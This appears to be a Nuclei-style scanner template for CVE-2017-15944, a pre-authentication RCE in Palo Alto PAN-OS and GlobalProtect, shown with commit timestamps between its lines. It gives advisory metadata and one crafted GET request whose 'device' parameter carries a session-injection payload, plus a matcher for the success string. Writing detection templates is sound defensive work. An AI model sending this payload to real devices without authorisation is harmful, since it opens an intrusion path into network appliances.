2021-06-18 20:45:44 +00:00
id : CVE-2017-15944
info :
name : PreAuth RCE on Palo Alto GlobalProtect
2021-07-17 11:37:28 +00:00
author : emadshanab,milo2012
2021-08-29 06:48:18 +00:00
description : Palo Alto Networks PAN-OS before 6.1.19, 7.0.x before 7.0.19, 7.1.x before 7.1.14, and 8.0.x before 8.0.6 allows remote attackers to execute arbitrary code via vectors involving the management interface.
2021-08-18 11:37:49 +00:00
reference :
2021-08-19 14:44:46 +00:00
- https://www.exploit-db.com/exploits/43342
- http://blog.orange.tw/2019/07/attacking-ssl-vpn-part-1-preauth-rce-on-palo-alto.html
2021-09-10 11:26:40 +00:00
severity : critical
2021-07-17 11:37:28 +00:00
tags : cve,cve2017,rce,vpn,paloalto,globalprotect
2021-09-10 11:26:40 +00:00
classification :
cvss-metrics : CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score : 9.80
cve-id : CVE-2017-15944
2021-06-18 20:45:44 +00:00
requests :
2021-07-17 11:37:28 +00:00
- raw :
- |
GET /esp/cms_changeDeviceContext.esp?device=aaaaa:a%27";user|s."1337"; HTTP/1.1
Host : {{Hostname}}
Cookie : PHPSESSID={{randstr}};
2021-06-18 20:45:44 +00:00
matchers-condition : and
matchers :
- type : word
words :
2021-07-17 11:37:28 +00:00
- "@start@Success@end@"
part : body
2021-06-18 20:45:44 +00:00
- type : status
status :
2021-07-17 11:37:28 +00:00
- 200